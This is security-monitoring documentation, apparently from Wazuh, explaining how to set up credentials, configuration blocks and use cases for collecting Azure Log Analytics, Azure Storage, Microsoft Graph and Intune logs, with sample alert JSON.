The Wazuh module for Azure must have access credentials to connect to Azure successfully. The credentials required vary depending on the type of monitoring. These include:

  • Access credentials for Microsoft Graph and Azure Log Analytics

  • Access credentials for Microsoft Azure Storage

The following sections provide an overview of how you can create these credentials.

Getting access credentials for Microsoft Graph and Azure Log Analytics

You need valid application_id and application_key values to authenticate connection from the Wazuh module for Azure.

Follow the steps below to obtain an application_id and application_key:

  1. Go to Microsoft Entra ID and navigate to the registered application.

  2. Go to the Certificates & secrets section of the chosen application, then generate a secret key by selecting New client secret.

  3. Give the key a descriptive name and specify the duration for which the key should remain active, then select Add.

  4. Copy the Value and the Secret ID. Ensure you securely store these values, as you can only view them once. The Value is the application_key.

  5. Copy the application_id value for your registered application from the Overview section.

Getting access credentials for Microsoft Azure Storage

The Microsoft Azure Storage requires valid account_name and account_key values. You can obtain them in the Access keys section of Storage accounts on your Azure environment. Follow the Microsoft guide to create a storage account.

The section below shows the steps to retrieving the Microsoft Azure Storage account key.

  1. Go to the Storage accounts section of your Microsoft Azure environment and select the account of interest.

  2. Navigate to Access keys located on the left pane to access the account_name and account_key values.

Wazuh Azure authentication file

To authenticate your Microsoft Azure environment to Wazuh, you must store your credentials in a file using the format field = value.

The fields expected to be present in the credentials file depend on the type of service or activity you are monitoring.

Microsoft Azure Log Analytics and Graph

The file must contain only two lines, one for the application_id and another for the application_key obtained previously:

application_id = <YOUR_APPLICATION_ID>
application_key = <YOUR_APPLICATION_KEY>
Microsoft Azure Storage

The file must contain only two lines, one for the account_name and the other one for the account_key obtained previously:

account_name = <YOUR_ACCOUNT_NAME>
account_key = <YOUR_ACCOUNT_KEY>

Specify the authentication file in the /var/ossec/etc/ossec.conf configuration file using the <auth_path> tag, regardless of the service or activity you monitor. Take a look at the following example:

<wodle name="azure-logs">
  <disabled>no</disabled>
  <run_on_start>yes</run_on_start>

  <log_analytics>
     <auth_path>/var/ossec/wodles/credentials/log_analytics_credentials</auth_path>
      <tenantdomain>wazuh.com</tenantdomain>
      <request>
          <query>AzureActivity</query>
          <workspace>12345678-90ab-cdef-1234-567890abcdef</workspace>
          <time_offset>1d</time_offset>
      </request>
  </log_analytics>

  <graph>
     <auth_path>/var/ossec/wodles/credentials/graph_credentials</auth_path>
      <tenantdomain>wazuh.com</tenantdomain>
      <request>
          <query>auditLogs/directoryAudits</query>
          <time_offset>1d</time_offset>
      </request>
  </graph>

<storage>
     <auth_path>/var/ossec/wodles/credentials/storage_credentials</auth_path>
      <container name="insights-activity-logs">
          <blobs>.json</blobs>
          <content_type>json_inline</content_type>
          <time_offset>24h</time_offset>
      </container>
  </storage>
</wodle>

For more information on <auth_path>, look at the Wazuh module for Azure reference page.

Adding more than one request block simultaneously in the same configuration is possible. The Wazuh module for Azure would process each request sequentially. The above configuration is an example. It includes Microsoft Azure Log Analytics, Graph, and Storage configuration blocks.

Reparse

Warning

The reparse option will fetch and process all the logs from the starting date until the present. This process may generate duplicate alerts.

To fetch and process older Azure logs, you must run the Wazuh module for Azure using the --reparse option.

The la_time_offset value sets the time as an offset for the starting point. If you don't provide a la_time_offset value, the Wazuh module for Azure returns to the date it processed the first file.

The following code block shows an example of running the Wazuh module for Azure on a Wazuh manager using the --reparse option:

# /var/ossec/wodles/azure/azure-logs --log_analytics --la_auth_path credentials_example --la_tenant_domain 'wazuh.example.domain' --la_tag azure-activity --la_query "AzureActivity" --workspace example-workspace --la_time_offset 50d --debug 2 --reparse

The --debug 2 parameter gets a verbose output. This output is helpful to show that the script works, especially when handling a large amount of data.

Microsoft Azure Log Analytics

Microsoft Azure Log Analytics is a service that monitors your Microsoft Azure infrastructure, offering query capabilities that allow you to perform advanced searches specific to your data.

The Azure Log Analytics solution helps you to analyze and search Azure activity logs in all your Azure subscriptions, providing information about the operations performed with the resources of your subscriptions.

You can query data collected by Log Analytics using the Azure Log Analytics REST API, which uses the Microsoft Entra ID authentication scheme. You need a qualified application or client to use the Azure Log Analytics REST API. You must configure this manually on the Microsoft Azure portal. The section below shows how to set up the application and gives a use case:

Configuration
Azure
Setting up the application

The process below details creating an application using the Azure Log Analytics REST API. It is also possible to configure an existing application. Please skip the Creating the application step if you already have an existing application.

Creating the application

We navigate to the Microsoft Entra ID panel on the Microsoft Azure portal to create a new application for Azure Log Analytics.

  1. Select the App registrations option from the Microsoft Entra ID panel. Then, select New registration.

  2. Define the user-facing display name for the application and select Register.

Granting permissions to the application
  1. Select All applications from App registration and refresh it. The new application will appear. In our case, the display name is LogAnalyticsApp.

  2. Go to the Overview section and save the Application (client) ID for later authentication.

  3. Go to the API permissions section and add the Data.Read permission to the application.

  4. Search for the Log Analytics API.

  5. Select the Read Log Analytics data permission from Applications permissions.

  6. Use an admin user to Grant admin consent for the tenant.

Granting the application access to the Azure Log Analytics API
  1. Access Log Analytics workspaces and create a new workspace or choose an existing one.

  2. Copy the Workspace ID value from the Overview section.

  3. Go to the Access control (IAM) section, click Add and select Add role assignment to add the required role to the application.

  4. Select the Log Analytics Reader role from the Job functions role tab.

  5. Select User, group, or service principal from the Members tab. Click Select members and find the App registration created previously.

  6. Click Review + assign to finish.

Sending logs to the Workspace

You need to create a diagnostic setting to collect logs and send them to the Azure Log Analytics Workspace created in the previous steps.

  1. Return to Microsoft Entra ID, scroll down on the left menu bar, and select the Diagnostic settings section.

  2. Click on Add diagnostic setting.

  3. Choose the log categories you want to collect from under Categories. Check the Send to Log Analytics workspace option under Destination details. Select the Log Analytics Workspace you created in the previous steps.

  4. Click on Save.

Azure Log Analytics will stream the selected categories to your workspace.

Wazuh requires valid credentials to pull logs from Azure Log Analytics. Look at the credentials section to learn how to generate a client secret to access the App registration.

Wazuh server or agent

You need to authorize the Wazuh module for Azure to access your Azure Log Analytics. For more information about setting up authorization, see the Configuring Azure credentials section.

  1. Apply the following configuration to the local configuration file /var/ossec/etc/ossec.conf of the Wazuh server or agent. This will depend on where you configured the Wazuh module for Azure:

    <wodle name="azure-logs">
        <disabled>no</disabled>
        <run_on_start>no</run_on_start>
    
        <log_analytics>
            <auth_path>/var/ossec/wodles/credentials/log_analytics_credentials</auth_path>
            <tenantdomain>wazuh.com</tenantdomain>
    
            <request>
                <tag>azure-auditlogs</tag>
                <query>AuditLogs</query>
                <workspace>d6b...efa</workspace>
                <time_offset>1d</time_offset>
            </request>
    
        </log_analytics>
    </wodle>
    

    Where:

    • <auth_path> is the full path of where the workspace secret key is stored.

    • <tenantdomain> is the tenant domain name. You can obtain this from the Overview section in Microsoft Entra ID.

    • <workspace> is the workspace ID that you need for authentication.

    • <time_offset> is the timeframe dated backwards. In this case, all logs within a 24-hour timeframe will be downloaded.

  2. Restart your Wazuh server or agent, depending on where you configured the Wazuh module for Azure.

    Wazuh agent:

    # systemctl restart wazuh-agent
    

    Wazuh server:

    # systemctl restart wazuh-manager
    

The configuration above allows Wazuh to search through any query using the tag value as the identifier.

Check the reference for more information about the Wazuh module for Azure.

Use case

Here is an example of monitoring the infrastructure activity using the previously created Azure application.

Creating a user

Follow the steps outlined below to create a user on Microsoft Entra ID:

  1. Navigate to Entra ID and select All users.

  2. Click on New User.

  3. Choose the option to Create a new user.

  4. Provide the necessary details for the user you want to create, and then choose the Create option to complete the creation.

Visualizing the events on the Wazuh dashboard

Once set up, you can check the results in the Wazuh dashboard.

Microsoft Azure Storage

Microsoft Azure Storage refers to the Microsoft Azure cloud storage solution. This service provides a massively scalable object store for data objects, a messaging store for reliable messaging, a file system service for the cloud, and a NoSQL store.

As an alternative to the Azure Log Analytics REST API, Wazuh offers access to a Microsoft Azure Storage account. You can export the activity logs of the Microsoft Azure infrastructure to the storage accounts.

This section explains using the Azure portal to archive your Microsoft Azure activity logs in a storage account.

Configuration
Azure
Configuring the activity log export
  1. Select the Audit Logs option from the Monitoring section within Microsoft Entra ID and click on Export Data Settings.

  2. Click Add diagnostic setting.

  3. Select the AuditLogs and Archive to the storage account checkbox, then select the subscription and Storage account to which you want to export the logs from the dropdown menu.

Wazuh server or agent

It is important to set the account_name and account_key of the storage account to authenticate. The image below shows an already configured storage account.

Check the credentials section for guidance on configuring Microsoft Azure Storage credentials.

  1. Apply the following configuration to the local configuration file /var/ossec/etc/ossec.conf of the Wazuh server or agent. This will depend on where you configured the Wazuh module for Azure:

    <wodle name="azure-logs">
    
        <disabled>no</disabled>
        <interval>1d</interval>
        <run_on_start>yes</run_on_start>
    
        <storage>
    
                <auth_path>/home/manager/Azure/storage_auth.txt</auth_path>
                <tag>azure-activity</tag>
    
                <container name="insights-activity-logs">
                    <blobs>.json</blobs>
                    <content_type>json_inline</content_type>
                    <time_offset>24h</time_offset>
                    <path>info-logs</path>
                </container>
    
        </storage>
    </wodle>
    

    Where

    • <auth_path> is the full path of where the workspace secret key is stored.

    • <container> contains useful parameters while fetching blog storage contents.

    • <container name="insights-activity-logs"> the log container that will be streamed.

    • <blobs>.json</blobs> is the blob format that will be downloaded.

    • <time_offset> is the timeframe dated backward. In this case, all logs within a 24-hour timeframe will be downloaded.

    • <content_type> is the format for storing the content of the blobs.

    Check the Wazuh module for Azure reference page to learn more about the parameters available and how to use them.

  2. Restart your Wazuh server or agent, depending on where you configured the Wazuh module for Azure.

    Wazuh agent:

    # systemctl restart wazuh-agent
    

    Wazuh server:

    # systemctl restart wazuh-manager
    
Use case

Here is an example of Microsoft Entra ID activity monitoring using the above configuration.

Create a new user

Create a new user in your Microsoft Azure environment using Microsoft Entra ID. A few minutes after creating the user, a new log will be available in a container named insights-activity-logs inside the Storage account specified when configuring the Activity log export.

Please refer to the creating a user section under the Azure Log Analytics use case.

You can check the results in the Wazuh dashboard.

Microsoft Graph

In this section, you will learn how to monitor your Microsoft Entra ID activity using the Microsoft Graph REST API. This section contains:

The following are endpoints in the Microsoft Graph REST API related to auditing and monitoring activities in Microsoft Entra ID.

Report type

Query

Directory audits

auditLogs/directoryaudits

Sign-ins

auditLogs/signIns

Provisioning

auditLogs/provisioning

These endpoints allow administrators and developers to monitor and audit activities within Microsoft Entra ID for security, compliance, and operational purposes.

Wazuh can process Microsoft Entra ID activity reports using the above endpoints. Each one of them requires you to execute a different query. You will place these queries within the command block of your Wazuh module for Azure configuration.

Configuration
Azure
Creating the application

This section explains creating an application using the Azure Log Analytics REST API. However, it is also possible to configure an existing application. If this is the case, skip this step.

  1. In the Microsoft Entra ID panel, select App registrations. Then, select New registration.

  2. Give the app a descriptive name, select the appropriate account type, and click Register.

The app is now registered.

Granting permissions to the application
  1. Click on the application, go to the Overview section, and save the Application (client) ID for later authentication.

  2. Select the Add a permission option in the API permissions section.

  3. Search for "Microsoft Graph" and select the API.

  4. Select the permissions in Applications permissions that align with your infrastructure. In this case, AuditLog.Read.All permissions will be granted. Then, click Add permissions.

  5. Use an admin user to Grant admin consent for the tenant.

Obtaining the application key for authentication

To use the Log Analytics API to retrieve the logs, we must generate an application key to authenticate the Log Analytics API. Follow the steps below to generate the application key.

  1. Select Certificates & secrets, then select New client secret to generate a key.

  2. Give an appropriate description, set a preferred duration for the key, and then click Add.

  3. Copy the key value. This would be later used for authentication.

    Note

    Copy the key before exiting this page, as it will only be displayed once. If you do not copy it before exiting the page, you will have to generate a fresh key.

Wazuh server or agent

You will use the key and ID of the application saved during the previous steps here. In this case, both fields were saved in a file for authentication. Check the Configuring Azure credentials section for more information about this topic.

  1. Apply the following configuration to the local configuration file /var/ossec/etc/ossec.conf of the Wazuh server or agent. This will depend on where you configured the Wazuh module for Azure:

    <wodle name="azure-logs">
      <disabled>no</disabled>
      <wday>Monday</wday>
      <time>2:00</time>
      <run_on_start>no</run_on_start>
    
      <graph>
        <auth_path>/var/ossec/wodles/azure/credentials</auth_path>
        <tenantdomain>wazuh.com</tenantdomain>
        <request>
            <tag>microsoft-entra_id</tag>
            <query>auditLogs/directoryAudits</query>
            <time_offset>1d</time_offset>
        </request>
      </graph>
    
    </wodle>
    

    Where:

    • <auth_path> is the full path of where the workspace secret key is stored.

    • <tenantdomain> is the tenant domain name. You can obtain this from the Overview section in Microsoft Entra ID

    • <wday> is the day of the week scheduled for the scan

    • <query> is the path to where the audit logs are stored.

    • <time> is the time scheduled for the scan.

    • <time_offset> set to 1d means that only the log data from the last day is parsed.

  2. Restart your Wazuh server or agent, depending on where you configured the Wazuh module for Azure.

    Wazuh agent:

    # systemctl restart wazuh-agent
    

    Wazuh server:

    # systemctl restart wazuh-manager
    

Check the Wazuh module for Azure reference for more information about using the different available parameters. Please see the Wazuh Azure authentication file section for guidance on how to set up credentials to monitor your Microsoft Entra ID.

Warning

The field tenantdomain is mandatory. You can obtain it from the Overview section in Microsoft Entra ID.

Use case
Monitoring Microsoft Entra ID

Microsoft Entra ID is the identity and directory management service that combines essential directory services, application access management, and identity protection in a single solution.

Wazuh can monitor the Microsoft Entra ID (ME-ID) service using the activity reports provided by the Microsoft Graph REST API. Microsoft Graph API can perform read operations on directory data and objects on Microsoft Entra ID applications.

Here is an example of Microsoft Entra ID activity monitoring using the above configuration.

Create a new user

Create a new user in Azure. A successful user creation activity will produce a log to reflect it. You can retrieve this log using the auditLogs/directoryAudits query.

  1. Navigate to Users > All users, select New user > Create new user.

  2. Fill in the required details and click Review + create. The user is now created.

You can check for the result of the successful user creation in the Audit logs section of Microsoft Entra ID.

Once the integration is running, the results will be available in the Security Events tab of the Wazuh dashboard.

Monitoring Microsoft Graph services with Wazuh

The Microsoft Graph API is a comprehensive system that provides access to data across the full suite of Microsoft cloud services, including Microsoft 365, Azure, Dynamics 365, and other Microsoft cloud services. It is an endpoint for accessing structured data, insights, and rich relationships from the Microsoft Cloud ecosystem.

This section provides instructions for monitoring your organization's Microsoft Graph API resources and relationships using the Wazuh module for Microsoft Graph.

The Wazuh module for Microsoft Graph allows you to monitor the following:

  • Microsoft Entra ID Protection

  • Microsoft 365 Defender

  • Microsoft Defender for Cloud Apps

  • Microsoft Defender for Endpoint

  • Microsoft Defender for Identity

  • Microsoft Defender for Office 365

  • Microsoft Purview eDiscovery

  • Microsoft Purview Data Loss Prevention (DLP)

The data from these services is visualised using the Wazuh Microsoft API Dashboard

While these are fundamental to the security resource, you can monitor many additional resources using the Microsoft Graph API. See the Overview of Microsoft Graph documentation to learn more.

Note

The security resource can be considered mature, as it has been tested with pre-made rules. However, your organization can ingest logs from other resources into your Wazuh deployment.

Retrieving content

To retrieve a set of logs from Microsoft Graph, make a GET request using the URL below:

GET https://graph.microsoft.com/{version}/{resource}/{relationship}?{query-parameters}

A description of the current production version of the Microsoft Graph API can be found in the Overview of Microsoft Graph.

Alternatively, the API can be tested directly in the Microsoft Graph Explorer.

Microsoft Graph API setup

Wazuh must be authorized before it can pull logs and other content from the Microsoft Graph API. This authentication process is possible using the tenant_id, client_id, and secret_value of an authorized application, which we will register through Azure.

Registering your app
  1. Register an application to authenticate with the Microsoft identity platform endpoint.

  2. Fill in the name of your app, choose the desired account type, and click on the Register button:

The app is now registered; you can see information about it in its Overview section. Make sure to note down the client_id and tenant_id information:

Certificates & secrets
  1. Generate a secret you will use for the authentication process. Go to Certificates & secrets and click on New client secret, which will then generate the secret and its ID:

  2. Ensure to copy and save the secret_value information:

    Note

    Ensure you write down the secret's value section, as the UI won't let you copy it later.

API permissions

Your application needs specific API permissions to retrieve logs and events from the Microsoft Graph API. The specific API permission required depends on the resource to be accessed. The comprehensive list of permissions is documented in Microsoft Graph permissions reference.

To configure the application permissions, go to the API permissions page and choose Add a permission.

  1. Select Microsoft Graph API and click on Application permissions:

  2. Add the following relationships' permissions under the SecurityAlert and SecurityIncident sections:

    • SecurityAlert.Read.All: This permission is required to read security alerts from the /security/alerts_v2 API on your tenant.

    • SecurityIncident.Read.All: This permission is required to read security incident data, including associated events/alerts from the /security/incidents API on your tenant.

  3. Use an admin user to Grant admin consent for the tenant:

    API permissions Intune

    Note

    An Admin account is required to Grant admin consent for Default Directory.

Wazuh server or agent

Next, we will set the necessary configurations to allow the Wazuh module for Microsoft Graph to pull logs from the Microsoft Graph API successfully.

  1. Apply the following configuration to the local configuration file /var/ossec/etc/ossec.conf:

    <ms-graph>
        <enabled>yes</enabled>
        <only_future_events>yes</only_future_events>
        <curl_max_size>10M</curl_max_size>
        <run_on_start>yes</run_on_start>
        <interval>5m</interval>
        <version>v1.0</version>
        <api_auth>
          <client_id><YOUR_APPLICATION_ID></client_id>
          <tenant_id><YOUR_TENANT_ID></tenant_id>
          <secret_value><YOUR_SECRET_VALUE></secret_value>
          <api_type>global</api_type>
        </api_auth>
        <resource>
          <name>security</name>
          <relationship>alerts_v2</relationship>
          <relationship>incidents</relationship>
        </resource>
        <resource>
          <name>deviceManagement</name>
          <relationship>auditEvents</relationship>
        </resource>
    </ms-graph>
    

    In this case, we will search for alerts_v2 and incidents within the security resource at an interval of 5m. The logs will only be created after the Wazuh module for Microsoft Graph starts.

    Where:

    • <client_id> (also known as an Application ID) is the unique identifier of your registered application.

    • <tenant_id> (also known as Directory ID) is the unique identifier for your Azure tenant

    • <secret_value> is the value of the client secret. It is used to authenticate the registered app on the Azure tenant.

    • <api_type> specifies the type of Microsoft 365 subscription plan the tenant uses. global refers to either a commercial or GCC tenant.

    • <name> specifies the resource's name (i.e., specific API endpoint) to query for logs.

    • <relationship> specifies the types of content (relationships) to obtain logs for.

  2. Restart your Wazuh server or agent, depending on where you configured the Wazuh module for Microsoft Graph.

    Wazuh agent:

    # systemctl restart wazuh-agent
    

    Wazuh server:

    # systemctl restart wazuh-manager
    

Note

Multi-tenant is not supported. You can only configure one block of api_auth. To learn more about the Wazuh module for Microsoft Graph options, see the ms-graph reference.

Use cases

Using the configuration mentioned above, we examine the following use cases:

  • Monitoring security resources.

  • Monitoring Microsoft Intune device management audit events.

Monitoring security resources

One ubiquitous alert an organisation of any size receives is spam email. In this case, we can examine a spam email containing malicious content and see how Microsoft Graph and Wazuh report on this information.

We can set up the Wazuh module for Microsoft Graph to monitor the security resource and the alerts_v2 relationship within our Microsoft 365 tenant described in Retrieving content. We also enable Microsoft Defender for Office 365 within the Microsoft 365 tenant. Microsoft Defender for Office 365 monitors email messages for threats such as spam and malicious attachments.

Detect malicious email

Enable Microsoft Defender for Office 365 and send a malicious email to an email address in the monitored domain. A malicious email detection activity will produce a log that can be accessed using the alerts_v2 relationship within the Microsoft 365 tenant.

  1. Log in to Microsoft 365 Defender portal using an admin account.

  2. Navigate to Policies & rules > Threat policies > Preset Security Policies.

  3. Toggle the Standard protection is off button under Standard protection.

  4. Click on Manage protection settings and follow the prompt to set up the policies.

When Microsoft Defender for Office 365 detects a malicious email event, a log similar to the following is generated. You can view this event using the Alerts tab of the Microsoft Defender for Office 365 page:

{
    "id":"xxxx-xxxx-xxxx-xxxx-xxxx",
    "providerAlertId":"xxxx-xxxx-xxxx-xxxx-xxxx",
    "incidentId":"xx",
    "status":"resolved",
    "severity":"informational",
    "classification":"truePositive",
    "determination":null,
    "serviceSource":"microsoftDefenderForOffice365",
    "detectionSource":"microsoftDefenderForOffice365",
    "detectorId":"xxxx-xxxx-xxxx-xxxx-xxxx",
    "tenantId":"xxxx-xxxx-xxxx-xxxx-xxxx",
    "title":"Email messages containing malicious file removed after delivery.",
    "description":"Emails with malicious file that were delivered and later removed -V1.0.0.3",
    "recommendedActions":"",
    "category":"InitialAccess",
    "assignedTo":"Automation",
    "alertWebUrl":"https://security.microsoft.com/alerts/xxxx-xxxx-xxxx-xxxx-xxxx?tid=xxxx-xxxx-xxxx-xxxx-xxxx",
    "incidentWebUrl":"https://security.microsoft.com/incidents/xx?tid=xxxx-xxxx-xxxx-xxxx-xxxx",
    "actorDisplayName":null,
    "threatDisplayName":null,
    "threatFamilyName":null,
    "mitreTechniques":[
        "T1566.001"
    ],
    "createdDateTime":"2022-11-13T23:48:21.9847068Z",
    "lastUpdateDateTime":"2022-11-14T00:08:37.5366667Z",
    "resolvedDateTime":"2022-11-14T00:07:25.7033333Z",
    "firstActivityDateTime":"2022-11-13T23:45:41.0593397Z",
    "lastActivityDateTime":"2022-11-13T23:47:41.0593397Z",
    "comments":[

    ],
    "evidence":[
        {
            "_comment":"Snipped"
        }
    ]
}

The Wazuh module for Microsoft Graph retrieves this log via the Microsoft Graph API. This log matches an out-of-the-box rule with ID 99506. This triggers an alert with the following details:

{
    "timestamp":"2024-08-29T14:53:15.301+0000",
    "rule":{
        "id":"99506",


           "level":6,


           "description":"MS Graph message: The alert is true positive and detected malicious activity.",
            "groups":["ms-graph"],
            "firedtimes":1,
            "mail":"false"
    },
    "agent":{
        "id":"001",
        "name":"ubuntu-bionic"
    },
    "manager":{
        "name":"ubuntu-bionic"
    },
    "id":"1623276774.47272",
    "decoder":{
        "name":"json"
    },
    "data":{
        "integration":"ms-graph",
        "ms-graph":{
            "id":"xxxx-xxxx-xxxx-xxxx-xxxx",
            "providerAlertId":"xxxx-xxxx-xxxx-xxxx-xxxx",
            "incidentId":"91",
            "status":"resolved",
            "severity":"informational",
            "classification":"truePositive",
            "determination":null,
            "serviceSource":"microsoftDefenderForOffice365",
            "detectionSource":"microsoftDefenderForOffice365",
            "detectorId":"xxxx-xxxx-xxxx-xxxx-xxxx",
            "tenantId":"xxxx-xxxx-xxxx-xxxx-xxxx",
            "title":"Email messages containing malicious file removed after delivery.",
            "description":"Emails with malicious file that were delivered and later removed -V1.0.0.3",
            "recommendedActions":"",
            "category":"InitialAccess",
            "assignedTo":"Automation",
            "alertWebUrl":"https://security.microsoft.com/alerts/xxxx-xxxx-xxxx-xxxx-xxxx?tid=xxxx-xxxx-xxxx-xxxx-xxxx",
            "incidentWebUrl":"https://security.microsoft.com/incidents/91?tid=xxxx-xxxx-xxxx-xxxx-xxxx",
            "actorDisplayName":null,
            "threatDisplayName":null,
            "threatFamilyName":null,
            "resource":"security",
            "relationship":"alerts_v2",
            "mitreTechniques":[
                "T1566.001"
            ],
            "createdDateTime":"2022-11-13T23:48:21.9847068Z",
            "lastUpdateDateTime":"2022-11-14T00:08:37.5366667Z",
            "resolvedDateTime":"2022-11-14T00:07:25.7033333Z",
            "firstActivityDateTime":"2022-11-13T23:45:41.0593397Z",
            "lastActivityDateTime":"2022-11-13T23:47:41.0593397Z",
            "comments":[

            ],
            "evidence":[
                {
                    "_comment":"Snipped"
                }
            ]
        }
    }
}

The alert is seen on the Wazuh dashboard.

Monitoring device management audit events
Intune event

Mobile Device Management (MDM) tools, such as Microsoft Intune, enable organizations to manage devices. By integrating Microsoft Graph with Wazuh, organizations can monitor Microsoft Intune logs.

For instance, if a user updates the enrollment settings, configuring the module to monitor the deviceManagement resource, the auditEvents relationship generates a JSON like the following:

{
    "id":"xxxx-xxxx-xxxx-xxxx-xxxx",
    "displayName": "Create DeviceEnrollmentConfiguration",
    "componentName": "Enrollment",
    "activity": null,
    "activityDateTime": "2024-08-09T18:29:00.7023255Z",
    "activityType": "Create DeviceEnrollmentConfiguration",
    "activityOperationType": "Create",
    "activityResult": "Success",
    "correlationId":"xxxx-xxxx-xxxx-xxxx-xxxx",
    "category": "Enrollment",
    "actor": {
        "auditActorType": "ItPro",
        "userPermissions": [
            "*"
        ],
        "applicationId":"xxxx-xxxx-xxxx-xxxx-xxxx",
        "applicationDisplayName": "Microsoft Intune portal extension",
        "userPrincipalName": "xxx@xxx.com",
        "servicePrincipalName": null,
        "ipAddress": null,
        "userId":"xxxx-xxxx-xxxx-xxxx-xxxx"
    },
    "resources": [
        {
            "displayName": "Test restriction",
            "auditResourceType": "DeviceEnrollmentLimitConfiguration",
            "resourceId":"xxxx-xxxx-xxxx-xxxx-xxxx",
            "modifiedProperties": [
                {
                    "displayName": "Id",
                    "oldValue": null,
                    "newValue":"xxxx-xxxx-xxxx-xxxx-xxxx_Limit"
                },
                {
                    "displayName": "Limit",
                    "oldValue": null,
                    "newValue": "5"
                },
                {
                    "displayName": "Description",
                    "oldValue": null,
                    "newValue": ""
                },
                {
                    "displayName": "Priority",
                    "oldValue": null,
                    "newValue": "1"
                },
                {
                    "displayName": "CreatedDateTime",
                    "oldValue": null,
                    "newValue": "8/9/2024 6:29:00 PM"
                },
                {
                    "displayName": "LastModifiedDateTime",
                    "oldValue": null,
                    "newValue": "8/9/2024 6:29:00 PM"
                },
                {
                    "displayName": "Version",
                    "oldValue": null,
                    "newValue": "1"
                },
                {
                    "displayName": "DeviceEnrollmentConfigurationType",
                    "oldValue": null,
                    "newValue": "Limit"
                },
                {
                    "displayName": "DeviceManagementAPIVersion",
                    "oldValue": null,
                    "newValue": "5023-03-29"
                },
                {
                    "displayName": "$Collection.RoleScopeTagIds[0]",
                    "oldValue": null,
                    "newValue": "Default"
                }
            ]
        }
    ]
}

In this example, you can look at rule ID 99652, which corresponds to the Microsoft Graph message "MDM Intune audit event.

<rule id="99652" level="3">
    <if_sid>99651</if_sid>
    <options>no_full_log</options>
    <field name="ms-graph.relationship">auditEvents</field>
    <description>MS Graph message: MDM Intune audit event.</description>
</rule>

Once Wazuh connects with the Microsoft Graph API, the previous log triggers the rule and raises the following Wazuh alert:

{
    "timestamp": "2024-08-09T18:29:03.362+0000",
    "rule": {
        "id": "99652",
        "level": 3,
        "description": "MS Graph message: MDM Intune audit event.",
        "firedtimes": 1,
        "mail": false,
        "groups": [
            "ms-graph"
        ]
    },
    "agent": {
        "id": "001",
        "name":"ubuntu-bionic"
    },
    "manager": {
        "name":"ubuntu-bionic"
    },
    "id": "1723228143.38630",
    "decoder": {
        "name": "json"
    },
    "data": {
        "integration": "ms-graph",
        "ms-graph": {
            "id": "xxxx-xxxx-xxxx-xxxx-xxxx",
            "displayName": "Create DeviceEnrollmentConfiguration",
            "componentName": "Enrollment",
            "activity": null,
            "activityDateTime": "2024-08-09T18:29:00.7023255Z",
            "activityType": "Create DeviceEnrollmentConfiguration",
            "activityOperationType": "Create",
            "activityResult": "Success",
            "correlationId": "xxxx-xxxx-xxxx-xxxx-xxxx",
            "category": "Enrollment",
            "actor": {
                "auditActorType": "ItPro",
                "userPermissions": [
                    "*"
                ],
                "applicationId": "xxxx-xxxx-xxxx-xxxx-xxxx",
                "applicationDisplayName": "Microsoft Intune portal extension",
                "userPrincipalName": "xxx@xxx.com",
                "servicePrincipalName": null,
                "ipAddress": null,
                "userId": "xxxx-xxxx-xxxx-xxxx-xxxx"
            },
            "resources": [
                {
                    "displayName": "Test restriction",
                    "auditResourceType": "DeviceEnrollmentLimitConfiguration",
                    "resourceId": "xxxx-xxxx-xxxx-xxxx-xxxx",
                    "modifiedProperties": [
                        {
                            "displayName": "Id",
                            "oldValue": null,
                            "newValue": "xxxx-xxxx-xxxx-xxxx-xxxx_Limit"
                        },
                        {
                            "displayName": "Limit",
                            "oldValue": null,
                            "newValue": "5"
                        },
                        {
                            "displayName": "Description",
                            "oldValue": null,
                            "newValue": ""
                        },
                        {
                            "displayName": "Priority",
                            "oldValue": null,
                            "newValue": "1"
                        },
                        {
                            "displayName": "CreatedDateTime",
                            "oldValue": null,
                            "newValue": "8/9/2024 6:29:00 PM"
                        },
                        {
                            "displayName": "LastModifiedDateTime",
                            "oldValue": null,
                            "newValue": "8/9/2024 6:29:00 PM"
                        },
                        {
                            "displayName": "Version",
                            "oldValue": null,
                            "newValue": "1"
                        },
                        {
                            "displayName": "DeviceEnrollmentConfigurationType",
                            "oldValue": null,
                            "newValue": "Limit"
                        },
                        {
                            "displayName": "DeviceManagementAPIVersion",
                            "oldValue": null,
                            "newValue": "5023-03-29"
                        },
                        {
                            "displayName": "$Collection.RoleScopeTagIds[0]",
                            "oldValue": null,
                            "newValue": "Default"
                        }
                    ]
                }
            ],
            "resource": "deviceManagement",
            "relationship": "auditEvents"
        }
    },
    "location": "ms-graph"
}

Microsoft Intune integration

Microsoft Intune is a cloud-based solution for managing various devices, including virtual endpoints, physical computers, mobile devices, and IoT devices. Integrating Microsoft Intune with Wazuh provides the following benefits:

  • It allows Wazuh to retrieve and process audit logs from managed devices using built-in decoders and rules, and generate insightful and actionable security alerts.

  • It enhances visibility into all managed endpoint activities, strengthening security monitoring across the organization.

  • It helps organizations ensure device administration aligns with compliance requirements, thus helping with maintaining security policies.

Wazuh integration with Microsoft Intune is available from Wazuh 4.10.0 and builds on the existing Microsoft Graph API integration. It operates synchronously, retrieving logs from managed endpoints at scheduled intervals. This integration allows the Wazuh agent to collect and process three types of data from Intune:

  • Audit events: Logs of actions and changes occurring within the Intune environment.

  • Managed devices: Information about devices managed by Intune.

  • Detected applications: Applications installed on managed devices as reported by Intune.

The configuration of this integration is handled via the Wazuh module for Microsoft Graph in the Wazuh agent. You must configure the deviceManagement resource (i.e., specific API endpoint) on the Wazuh agent with the following relationships to enable the integration:

  • auditEvents: Audit logs include a record of activities that generate a change in Microsoft Intune.

  • managedDevices: List of devices managed by Microsoft Intune.

  • detectedApps: List of applications managed by Microsoft Intune. The results will also include a list of devices where each app is installed.

Refer to the ms-graph configuration reference documentation for more information.

Configuration

Perform the following steps to integrate Microsoft Intune with Wazuh:

  • Configure the Microsoft Graph API permissions.

  • Configure the relationships.

  • Extend the Wazuh ruleset (optional).

  • Import custom dashboards.

Configure the Microsoft Graph API permissions

This integration allows Wazuh to pull data from the Microsoft Graph API. Before Wazuh can pull logs and other content from the Microsoft Graph API, it must be authorized and pass through an authentication process. Wazuh must provide the tenant_id, client_id, and secret_value of an authorized application that is registered through Azure.

This step involves configuring the API permissions required to access Microsoft Intune events via the Microsoft Graph API. The required permissions are:

  • DeviceManagementApps.Read.All: Read auditEvents and detectedApps relationship data from your tenant.

  • DeviceManagementManagedDevices.Read.All: Read auditEvents and managedDevices relationship data from your tenant.

For further information, please refer to the Microsoft Graph API setup guide.

Configure the relationships

The relationships auditEvents, managedDevices, and detectedApps need to be configured within the Wazuh module for Microsoft Graph in the Wazuh agent. This configuration enables Wazuh to search for logs created by Microsoft Graph resources and relationships.

